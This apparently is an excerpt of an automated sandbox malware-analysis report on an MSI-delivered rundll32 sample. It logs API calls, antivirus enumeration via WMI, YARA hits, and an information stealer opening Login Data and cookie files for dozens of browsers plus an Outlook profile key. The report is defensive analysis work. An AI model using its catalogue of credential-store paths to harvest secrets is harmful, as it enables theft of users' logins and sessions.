Source: C:\Windows\System32\rundll32.exe Code function: 5_2_000000018004A650 memset,GetModuleFileNameW,PathAppendW,ShellExecuteExW,ILGetSize,GetTickCount,srand,GetCurrentProcess,GetProcessId,GetCurrentThreadId,rand,LocalAlloc,InitializeSecurityDescriptor,LocalFree,SetSecurityDescriptorDacl,CreateFileMappingW,LocalFree,CreateFileMappingW,MapViewOfFile,CloseHandle,memset,memmove,memmove,memmove,memmove,memmove,UnmapViewOfFile,FindWindowW,SetForegroundWindow,memset,wsprintfW,memset,WaitForSingleObject,Sleep,CloseHandle,CloseHandle,CloseHandle, 5_2_000000018004A650
Source: C:\Windows\System32\rundll32.exe Code function: 5_2_0000000180049278 LookupPrivilegeValueW,LookupPrivilegeValueW,LookupPrivilegeValueW,LookupPrivilegeValueW,??_U@YAPEAX_K@Z,GetCurrentProcess,OpenProcessToken,CreateRestrictedToken,CloseHandle,CloseHandle,AllocateAndInitializeSid,GetLengthSid,SetTokenInformation,FreeSid,AdjustTokenPrivileges,??_V@YAXPEAX@Z, 5_2_0000000180049278
Source: 360total.dll.1.dr Binary or memory string: Program managerProgmanSeShutdownPrivilegeSeTimeZonePrivilegeSeIncreaseWorkingSetPrivilegeSeUndockPrivilegeSeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeEnableLUASoftware\Microsoft\Windows\CurrentVersion\Policies\Systemseclogonwdc.dllWdcRunTaskAsInteractiveUser"%s" %swinsta0\defaultadvapi32.dllCreateProcessWithTokenW:open..\360DeskAna64.exe%u_%d_%d_%d_%use2/%s %s %use1SeTcbPrivilegeNT AUTHORITYLOCAL SERVICENETWORK SERVICE360utilexplorer.exe,
Source: rundll32.exe Binary or memory string: Progman
Source: rundll32.exe Binary or memory string: Program manager
Source: C:\Windows\Installer\MSI181.tmp Code function: 3_2_005A35A9 cpuid 3_2_005A35A9
Source: C:\Windows\Installer\MSI181.tmp Code function: EnumSystemLocalesW, 3_2_005BE0C6
Source: C:\Windows\Installer\MSI181.tmp Code function: EnumSystemLocalesW, 3_2_005BE111
Source: C:\Windows\Installer\MSI181.tmp Code function: EnumSystemLocalesW, 3_2_005B7132
Source: C:\Windows\Installer\MSI181.tmp Code function: EnumSystemLocalesW, 3_2_005BE1AC
Source: C:\Windows\Installer\MSI181.tmp Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW, 3_2_005BE237
Source: C:\Windows\Installer\MSI181.tmp Code function: GetLocaleInfoEx, 3_2_005A23F8
Source: C:\Windows\Installer\MSI181.tmp Code function: GetLocaleInfoW, 3_2_005BE48A
Source: C:\Windows\Installer\MSI181.tmp Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP, 3_2_005BE5B3
Source: C:\Windows\Installer\MSI181.tmp Code function: GetLocaleInfoW, 3_2_005BE6B9
Source: C:\Windows\Installer\MSI181.tmp Code function: GetLocaleInfoW, 3_2_005B76AF
Source: C:\Windows\Installer\MSI181.tmp Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW, 3_2_005BE788
Source: C:\Windows\System32\msiexec.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\rundll32.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\Installer\MSI181.tmp Code function: 3_2_005A37D5 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter, 3_2_005A37D5
Source: C:\Windows\System32\rundll32.exe Code function: 5_2_00000235B5CE8AE0 GetUserNameA,wsprintfA, 5_2_00000235B5CE8AE0
Source: C:\Windows\Installer\MSI181.tmp Code function: 3_2_005B7B1F GetTimeZoneInformation, 3_2_005B7B1F
Source: C:\Windows\System32\rundll32.exe Code function: 5_2_0000000180040CB0 GetVersionExW,memset,SHGetValueW,atoi,GetVersion,GetModuleHandleW,GetProcAddress, 5_2_0000000180040CB0
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: WMIC.exe, 0000002A.00000003.3195192679.000001BA30DF5000.00000004.00000020.00020000.00000000.sdmp, WMIC.exe, 0000002A.00000002.3198657676.000001BA30FEA000.00000004.00000020.00020000.00000000.sdmp, WMIC.exe, 0000002A.00000003.3195527472.000001BA315C1000.00000004.00000020.00020000.00000000.sdmp, WMIC.exe, 0000002A.00000003.3197567716.000001BA30E04000.00000004.00000020.00020000.00000000.sdmp, WMIC.exe, 0000002A.00000003.3197538144.000001BA30DF9000.00000004.00000020.00020000.00000000.sdmp, WMIC.exe, 0000002A.00000002.3198389335.000001BA30E02000.00000004.00000020.00020000.00000000.sdmp, WMIC.exe, 0000002A.00000003.3197642042.000001BA30E00000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: pathToSignedReportingExe=%ProgramFiles%\Windows Defender\MsMpeng.exe
Source: WMIC.exe, 0000002A.00000002.3198657676.000001BA30FEA000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: gnedReportingExe=%ProgramFiles%\Windows Defender\MsMpeng.exe
Source: WMIC.exe, 0000002A.00000002.3197873224.0000008797B37000.00000004.00000010.00020000.00000000.sdmp Binary or memory string: ndows Defender\MsMpeng.exe
Source: rundll32.exe Binary or memory string: 360tray.exe
Source: rundll32.exe Binary or memory string: SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\App Paths\360safe.exe
Source: WMIC.exe, 0000002A.00000003.3194482895.000001BA30DD8000.00000004.00000020.00020000.00000000.sdmp, WMIC.exe, 0000002A.00000002.3198278627.000001BA30DE5000.00000004.00000020.00020000.00000000.sdmp, WMIC.exe, 0000002A.00000003.3195192679.000001BA30DE4000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: V%ProgramFiles%\Windows Defender\MsMpeng.exe
Source: WMIC.exe, 0000002A.00000002.3198657676.000001BA30FEA000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: indows Defender\MsMpeng.exe
Source: WMIC.exe, 0000002A.00000003.3194482895.000001BA30DD8000.00000004.00000020.00020000.00000000.sdmp, WMIC.exe, 0000002A.00000002.3198278627.000001BA30DE5000.00000004.00000020.00020000.00000000.sdmp, WMIC.exe, 0000002A.00000003.3195192679.000001BA30DE4000.00000004.00000020.00020000.00000000.sdmp, WMIC.exe, 0000002A.00000003.3196824187.000001BA3159C000.00000004.00000020.00020000.00000000.sdmp, WMIC.exe, 0000002A.00000002.3198199363.000001BA30DDA000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
Source: rundll32.exe Binary or memory string: SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\360safe.exe
Source: WMIC.exe, 0000002A.00000003.3195192679.000001BA30DF5000.00000004.00000020.00020000.00000000.sdmp, WMIC.exe, 0000002A.00000003.3197538144.000001BA30DF9000.00000004.00000020.00020000.00000000.sdmp, WMIC.exe, 0000002A.00000003.3197642042.000001BA30E00000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: ramFiles%\Windows Defender\MsMpeng.exe
Source: C:\Windows\System32\wbem\WMIC.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\Windows\System32\wbem\WMIC.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT displayName FROM AntiVirusProduct

Stealing of Sensitive Information

Source: Yara match File source: 7.2.rundll32.exe.1ef532b0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.rundll32.exe.235b4340000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.rundll32.exe.235b5ce0000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.rundll32.exe.235b4340000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.rundll32.exe.1ef532a0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.rundll32.exe.1ef532b0000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.rundll32.exe.1ef532a0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.rundll32.exe.235b5ce0000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000006.00000003.2983475717.000001800FE30000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000003.2790656279.000001800FA60000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000003.2738493222.000001800FE30000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000003.2983528800.000001800FE30000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000003.2934278162.000001800FE30000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000003.3043571681.000001800FE30000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.1683586362.00000235B4340000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.1683713965.00000235B5CE0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.1715800687.000001EF532A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000003.2995791620.0000018010010000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000003.2856871010.000001800FA60000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.1715838763.000001EF532B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000003.2656498432.000001800FA60000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: rundll32.exe PID: 7784, type: MEMORYSTR
Source: Yara match File source: decrypted.memstr, type: MEMORYSTR
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Local\QIP Surf\User Data\Default\Network\Cookies
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Local\CentBrowser\User Data\Default\Login Data
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Local\7Star\7Star\User Data\Default\Network\Cookies
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Local\Suhba\User Data\Default\Network\Cookies
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Local\Epic Privacy Browser\User Data\Default\Login Data
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Local\Nichrome\User Data\Default\Network\Cookies
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Local\Comodo\Dragon\User Data\Default\Login Data
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Local\Torch\User Data\Default\Network\Cookies
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Local\Chedot\User Data\Default\Network\Cookies
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Local\CocCoc\Browser\User Data\Default\Network\Cookies
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Local\Chedot\User Data\Default\Login Data
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Local\Amigo\User Data\Default\Network\Cookies
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Local\Vivaldi\User Data\Default\Network\Cookies
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Local\Chromium\User Data\Default\Network\Cookies
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Local\Kometa\User Data\Default\Network\Cookies
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Local\360Browser\Browser\User Data\Default\Login Data
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Local\Kometa\User Data\Default\Login Data
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Local\Superbird\User Data\Default\Login Data
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Local\Orbitum\User Data\Default\Network\Cookies
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Local\Google\Chrome SxS\User Data\Default\Network\Cookies
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Local\Torch\User Data\Default\Login Data
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Local\Xpom\User Data\Default\Login Data
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Local\Xpom\User Data\Default\Network\Cookies
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Local\Safer Technologies\Secure Browser\User Data\Default\Network\Cookies
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-shm
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Local\Go!\User Data\Default\Network\Cookies
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Local\Yandex\YandexBrowser\User Data\Default\Network\Cookies
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Local\RockMelt\User Data\Default\Network\Cookies
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Local\Sputnik\Sputnik\User Data\Default\Network\Cookies
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Local\Epic Privacy Browser\User Data\Default\Network\Cookies
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Local\Orbitum\User Data\Default\Login Data
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Local\Nichrome\User Data\Default\Login Data
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Local\7Star\7Star\User Data\Default\Login Data
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Local\360Browser\Browser\User Data\Default\Network\Cookies
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Local\Superbird\User Data\Default\Network\Cookies
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Local\CentBrowser\User Data\Default\Network\Cookies
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Local\Elements Browser\User Data\Default\Login Data
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Local\Sputnik\Sputnik\User Data\Default\Login Data
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Local\Amigo\User Data\Default\Login Data
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Local\CocCoc\Browser\User Data\Default\Login Data
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Local\Rafotech\Mustang\User Data\Default\Network\Cookies
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Local\Vivaldi\User Data\Default\Login Data
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Local\Bromium\User Data\Default\Network\Cookies
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Local\uCozMedia\Uran\User Data\Default\Login Data
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Local\Chromium\User Data\Default\Login Data
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Local\QIP Surf\User Data\Default\Login Data
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Local\Comodo\Dragon\User Data\Default\Network\Cookies
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Local\Elements Browser\User Data\Default\Network\Cookies
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Local\Google\Chrome SxS\User Data\Default\Login Data Jump to behavior
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Local\uCozMedia\Uran\User Data\Default\Network\Cookies Jump to behavior
Source: C:\Windows\System32\rundll32.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 Jump to behavior

Remote Access Functionality

Source: Yara match File source: 7.2.rundll32.exe.1ef532b0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.rundll32.exe.235b4340000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.rundll32.exe.235b5ce0000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.rundll32.exe.235b4340000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.rundll32.exe.1ef532a0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.rundll32.exe.1ef532b0000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.rundll32.exe.1ef532a0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.rundll32.exe.235b5ce0000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000006.00000003.2983475717.000001800FE30000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000003.2790656279.000001800FA60000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000003.2738493222.000001800FE30000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000003.2983528800.000001800FE30000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000003.2934278162.000001800FE30000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000003.3043571681.000001800FE30000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.1683586362.00000235B4340000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.1683713965.00000235B5CE0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.1715800687.000001EF532A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000003.2995791620.0000018010010000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000003.2856871010.000001800FA60000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.1715838763.000001EF532B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000003.2656498432.000001800FA60000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: rundll32.exe PID: 7784, type: MEMORYSTR
Source: Yara match File source: decrypted.memstr, type: MEMORYSTR